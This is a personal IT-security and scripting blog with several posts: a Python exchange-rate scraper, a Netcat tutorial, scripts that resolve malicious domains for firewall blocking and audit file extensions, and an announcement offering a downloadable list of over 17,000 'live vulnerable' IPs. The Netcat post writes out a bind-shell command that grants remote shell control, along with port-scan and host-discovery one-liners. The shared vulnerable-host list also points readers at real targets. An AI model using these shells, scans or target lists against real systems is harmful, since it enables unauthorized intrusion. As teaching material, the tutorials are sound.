Monday, 25 May 2020

How-To: Get Live Exchange Rates to the Terminal

Today I wanted to showcase a Python script I wrote to scrape a website and retrieve live exchange rates from around the world. Above you will see the output of the script.

What is the value of this? For one, the data is live as soon as the script is run. Now that the script is written, you could feed this data into another function in the script or send it to another program entirely; essentially, you can manipulate the data however you want.

A piece that I am not highlighting in this blog entry is the process behind finding viable targets to scrape and how to efficiently analyze their source code. When you develop a scraping script, the code is built around the structure of that site. You are literally searching through code that someone else designed. What happens when their code changes, even a little? Your whole scraping script could break. That is why care and attention should be taken when selecting a target. I will highlight some of my process in a future blog entry.

(You should know that this code was built around a specific target; it will not work on a different one. The goal here is to give you the right push to take this script and build it around a target of your choosing.)
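
To make that fragility concrete, here is a minimal sketch (my own illustration, not part of the script below) of what a structure change looks like to your code: a find on a tag that no longer exists quietly returns None.

from bs4 import BeautifulSoup

# Pretend the site was redesigned and the table we scraped is gone.
soup = BeautifulSoup("<html><body><p>new layout</p></body></html>", "html.parser")

results = soup.find("tbody")
if results is None:
    # Fail loudly here instead of crashing later with an AttributeError.
    raise SystemExit("Page structure changed -- update the scraper.")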

Let's go through this script and take a look at some of the specific elements that can lead to a good data scrape.

import os
from bs4 import BeautifulSoup
import requests
from prettytable import PrettyTable

if os.name == "nt":
    os.system("cls")
else:
    os.system("clear")


countryGrab = []
compareToUSD = [] #America
compareToEUR = [] #Europe
compareToJPY = [] #Japan
compareToGBP = [] #Britain
compareToCHF = [] #Switzerland
compareToCAD = [] #Canada
compareToAUD = [] #Australia
compareToHKD = [] #Hong Kong

x = PrettyTable()
x.field_names = ["Country","USD","EUR","JPY","GBP",
"CHF","CAD","AUD","HKD"]


url = "<insert website here>"
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
results = soup.find("tbody")

rows = results.find_all("tr")
num = 0
for row in rows:
    cell = row.find_all("td")
    
    links = cell[0].find_all('a')
    countryGrab.append(links[1].text)

    compareToUSD.append(cell[1].text)
    compareToEUR.append(cell[2].text)
    compareToJPY.append(cell[3].text)
    compareToGBP.append(cell[4].text)
    compareToCHF.append(cell[5].text)
    compareToCAD.append(cell[6].text)
    compareToAUD.append(cell[7].text)
    compareToHKD.append(cell[8].text)
    
    x.add_row([countryGrab[num],compareToUSD[num],
    compareToEUR[num],compareToJPY[num],
    compareToGBP[num],compareToCHF[num],
    compareToCAD[num],compareToAUD[num],
    compareToHKD[num]])
    num = num +1

print(x)





Let's take a look at a few key pieces in the script:
import os
from bs4 import BeautifulSoup
import requests
from prettytable import PrettyTable

if os.name == "nt":
    os.system("cls")
else:
    os.system("clear")

There are three key modules at work here:
1. bs4 (the scraping module, home of BeautifulSoup)
2. Requests (the module that handles the HTTP side and grabs the page)
3. PrettyTable (displays data in table format)

Bs4/BeautifulSoup is widely used; it allows us to take a grabbed website and cycle through its tags to find the content we want. I will not be going in depth on BeautifulSoup in this blog (saving that for another entry).
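
To give you a feel for it anyway, here is a toy example on a hard-coded snippet (not the real site) showing how we cycle through tags:

from bs4 import BeautifulSoup

html = "<table><tbody><tr><td>Canada</td><td>0.74</td></tr></tbody></table>"
soup = BeautifulSoup(html, "html.parser")

row = soup.find("tbody").find("tr")    # the first table row
cells = row.find_all("td")             # every cell in that row
print(cells[0].text, cells[1].text)    # -> Canada 0.74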

Requests, also very popular, goes hand in hand with BeautifulSoup. It is used to actually grab the website, and it makes an object for BeautifulSoup to sift through.

PrettyTable: it's in the name, really.

Above you also see that I am clearing the screen with a quick and dirty technique. Using "os.name" we can determine what type of operating system the script is running on, and depending on the result the matching clear command is run.


####################################################
 
countryGrab = []
compareToUSD = [] #America
compareToEUR = [] #Europe
compareToJPY = [] #Japan
compareToGBP = [] #Britain
compareToCHF = [] #Switzerland
compareToCAD = [] #Canada
compareToAUD = [] #Australia
compareToHKD = [] #Hong Kong

x = PrettyTable()
x.field_names = ["Country","USD","EUR","JPY","GBP",
"CHF","CAD","AUD","HKD"]

Here I am creating some empty lists that are going to get filled up in just a moment.

Underneath the empty lists I create an object "x" for the PrettyTable, followed by the names for the table headers. As you can see, these are the currency codes we are comparing (plus a column for the country).

####################################################
 url = "<insert website address here"
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
results = soup.find("tbody")

rows = results.find_all("tr")
num = 0
- url variable is set with the string of the website address
- create the page object using requests
- create the soup object with the content from page
- create the results object; at this point we are searching for the table tag "tbody"
- inside the results object we have stored all the website content that was inside the "tbody" tags. We want to dive deeper inside "tbody", so we create another object, rows, where we search inside "tbody" for all the table rows "tr"


####################################################
for row in rows:
    cell = row.find_all("td")
    
    links = cell[0].find_all('a')
    countryGrab.append(links[1].text)

    compareToUSD.append(cell[1].text)
    compareToEUR.append(cell[2].text)
    compareToJPY.append(cell[3].text)
    compareToGBP.append(cell[4].text)
    compareToCHF.append(cell[5].text)
    compareToCAD.append(cell[6].text)
    compareToAUD.append(cell[7].text)
    compareToHKD.append(cell[8].text)
    
    x.add_row([countryGrab[num],compareToUSD[num],
    compareToEUR[num],compareToJPY[num],
    compareToGBP[num],compareToCHF[num],
    compareToCAD[num],compareToAUD[num],
    compareToHKD[num]])
    num = num +1

print(x)

- inside our rows object we have a bunch of entries, lots of rows to search through. Within each row we have cells ("<td></td>"). The data we want is within the cells
- when we cycle through each row, we search for all cells based on the tag "td"
- since I spent a bit of time looking through the source code of the site, I know which cells contain the data I want. Here you can see that I am calling on particular cells and appending to the lists that were created earlier
- once the lists are filled we are ready to print the whole table!
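
As mentioned at the top, you can also feed this data onward instead of just printing it. A small sketch that extends the script above (assuming the scraped cells are plain numeric strings, which depends on your target):

# Convert one scraped column to floats and hand it to another calculation.
usd_rates = [float(rate.replace(",", "")) for rate in compareToUSD]
print("Average rate against USD:", sum(usd_rates) / len(usd_rates))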

There you go: a Python script that grabs up-to-date exchange rates from around the world!
A copy of the script is in my "Projects" page.

Thanks!!
Andrew Campbell








Tuesday, 19 May 2020

Netcat - The TCP/IP Swiss Army Knife

Hey,

This week I wanted to share some information about a very useful network tool. Netcat, originally released in '95, is one extremely powerful little utility. With a few simple keystrokes one can scan ports on a local or remote machine, connect to a remote machine, send files over your local network, conduct host discovery, and manage a machine remotely using a reverse shell.

People refer to Netcat as "The TCP/IP Swiss Army Knife." A reason for this is that a lot of other network tools and utilities you find in distros like Kali have a very specific purpose (they do that one "thing" and that is it). Netcat is not like this, and it is for this reason that being adept with this tool is imperative for any sysadmin/hacker.

Listening and Connecting:

Opening a port and having it listen can be very useful, and also potentially dangerous if you forget about it. An open port is an open port.


At this point anyone scanning your machine will be fed some information saying that your machine is open and ready to receive connections.
A quick scan of this specific port will tell us some information about it. We will dive deeper into port scanning in a bit.

We can open a port and set it to listening; then let's connect to that listening port and send some messages back and forth.



-l --> listening
-v --> verbose
-p --> port

listening machine -->  nc -lvp 4000 
connecting machine -->  nc <target ip> <port>

Sending a File:
It is possible to send files over your local network between machines.  It is also useful to know that you are not limited to text files.  You can send pictures and more.  Practice sending different files to fully understand the intricacies.



Make note that the receiving ("listening") machine is intentionally putting the data into a specific file, "doc.received". A tip: look at the direction of the ">". This symbol denotes the direction of the data.

nc -lvp 4000 > doc.received (incoming data will be written to the file "doc.received")

nc 192.168.1.77 4000 < doc.sent (data currently in "doc.sent" is being sent to 192.168.1.77 through port 4000)


Port Scan:
Netcat can be used to quickly check ports on local and remote machines.  Here I am checking the same local machine I was connecting to before.  I have opened up 3 ports.  If there were other ports in use they would have been discovered as well.

-n --> no name resolution
-v --> verbose
-z --> zero-I/O mode [used for scanning]
In the image you can see that I have selected a range of 1-200
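
Put together, the scan command looks something like this (same local machine as before):

nc -v -n -z 192.168.1.77 1-200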

You can also port scan websites.  Below I am scanning a popular port.  IP has been blacked out for obvious reasons.

Netcat will never replace other, more popular port scanners (nmap etc.), however in a pinch Netcat can get the job done.


Reverse Shell:

How about gaining complete control of a remote machine? Completely possible with Netcat. Let's take a look at the next couple of images.


Our target machine will have this command running on its system:

nc -lvp 4000 -e /bin/sh

"attacker" will connect to the target like so

nc <ip address> 4000

Because the target machine has a listening port open and is redirecting traffic to a shell, the connecting machine will have complete control of the target.

As you can see in the window I was able to do an "ls" and show everything in the directory.

Host Discovery:

One last interesting thing to show you today: we can use Netcat to probe the network and discover hosts.


for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done

Take a look at the above line. When we input it into a terminal it will start a for loop and conduct a port scan on port 443 for every IP address from 192.168.0.21 to 192.168.0.29. It is not incredibly fast, but if you find yourself in an environment without any GUI, Netcat could be very helpful.

Thanks, I hope this helps. I have included a link to a PDF with some more information on Netcat.

Andrew Campbell


https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf


Over 17,000 Live Vulnerable Sites Found!

Hey,

So I have been scraping for live vulnerable IPs for a week and I have crossed the 17,000 mark! I'm still working out some bugs in the process, however the results have been great.

I have scraped way more than 17,000, somewhere in the range of 50,000+. I have built into my scraping process an automatic check to see if an IP is live. That means that the list I am sharing has a very high probability of being live....right now.

I am continuing to strengthen the scraping process and automate it even more. Feel free to download the zip file from my page "Vulnerable IP".

Thanks!
Andrew Campbell

Tuesday, 12 May 2020

Convert List of Domain Names to their IP - Python

Hello All,

In this post we are going to use the Python socket module and file handling to convert a file of confirmed malicious domain names into their respective IP addresses. After the list has been processed, one could take the list of IP addresses and add them to a company/personal firewall.


Below is a list of actual bad domains [you probably shouldn't visit these ;) ].
This is the list we will be using in our demonstration.

The image below is the output after the script is run.

*Notice that 9 domains went into the grinder and only 5 IP addresses came out. If you look at the Python code more closely you will see a try/except where we catch a specific error, "socket.gaierror". When the socket module attempts to resolve a domain name, some domains cannot be resolved, so an error is raised. A possible cause of this is that the domain is not in action any more. However, getting the 5 as output shows that those bad websites are still reachable.

General Functionality:
-Script opens a file of bad domains
-cleans each line and sends the value to a function that uses the socket module to retrieve the IP address
-finally, the retrieved IP addresses are exported to an output file

Deeper Dive:
1-2: import modules
5-6: create the file object and a list "row" that contains all the lines of the file "malwaredomainlist.txt"
17-24: for each line in row, send the domain to the getIP function, take the returned IP, and send it to the output function to be added to output.txt
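
For reference, here is a minimal sketch of the approach described above (the getIP function name, the file names, and the socket.gaierror handling come straight from that description; the details may differ slightly from the script shown in the image):

import socket

def getIP(domain):
    # Some domains no longer resolve, so catch socket.gaierror.
    try:
        return socket.gethostbyname(domain)
    except socket.gaierror:
        return None

with open("malwaredomainlist.txt") as infile, open("output.txt", "w") as outfile:
    for line in infile:
        domain = line.strip()  # clean the input
        if not domain:
            continue
        ip = getIP(domain)
        if ip is not None:
            outfile.write(ip + "\n")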


There are other ways to retrieve the IP address of a website, like:

nslookup <site address>

or

ping <site address>

These tools are great and useful, however if you have a huge batch of domains to process, having a Python script on hand can save an enormous amount of time.

Shabbyporpoise

Sunday, 10 May 2020

File System Auditor - Extension Locator

Hello,

I wanted to share a quick bit about a Python script I wrote. I have also attached a video demonstrating it.
ext_locator.py



Executable files in an operating system can be packed with goodies that you are not aware of. Obviously running an AV test on your system would be the critical route, however if you are doing a static analysis of a system, you could use a tool similar to this.

Functionality:
-user inputs a parent directory
-script walks through the entire directory tree searching for extensions matching the list
-for any matching file, the absolute path is saved to a text file (see the sketch just below)
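
Here is a minimal sketch of the idea (my illustration rather than the full ext_locator.py; the extension list and the output file name "matches.txt" are assumptions):

import os

# Example extensions to flag -- adjust to the ones you care about.
SUSPECT_EXTENSIONS = (".exe", ".dll", ".bat", ".scr")

parent = input("Parent directory to audit: ")
with open("matches.txt", "w") as out:
    # Walk the entire tree underneath the parent directory.
    for dirpath, dirnames, filenames in os.walk(parent):
        for name in filenames:
            if name.lower().endswith(SUSPECT_EXTENSIONS):
                # Save the absolute path of every matching file.
                out.write(os.path.abspath(os.path.join(dirpath, name)) + "\n")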

Purpose:
-in a safe way, determine whether there are abnormal amounts of executable programs located somewhere on the system
-extensions in this list have been known to be packed with extra code that can link to malware
-narrow your search when analyzing a system

Friday, 8 May 2020

The First One - The Beginning

Hello All,

This is my first blog post. I am excited to be starting on this blogging journey discussing my favourite topics: IT Security and Automation.

In my career I have had a number of opportunities to expand my knowledge in this area through IT auditing and script development. Currently I teach at a polytechnic school in Canada, where I am pushed daily to expand the bounds of my knowledge and stretch myself further. I love the challenge of teaching IT Security. I am in the perfect field, because learning is what I crave.

The goal for this blog is to be a centralized location for collaboration and the sharing of knowledge. I know there are many excellent places across the internet to do this very same thing. However, there is something about starting something on your own.

I absolutely love scripting; it is so satisfying seeing your work assist others. I love taking repetitive tasks and turning them into jobs that can run on their own. Automation is awesome because a successfully created script can do the same task over and over and do it with 100% accuracy every single time.

I plan on sharing scripts that I am developing; hopefully they can be of some assistance to someone out there. The complexity level will range and the jobs tackled will vary. I am sure there are some senior-level programmers out there who will see my code and cringe. Feel free to inform me. I hope that everyone who reads this is similar to me, in that we want to learn and expand our knowledge.

I am also open to suggestions for additions to projects.  If a script is missing a key feature, let me know and I can include it :)

Thanks Everyone

Regards,
Andrew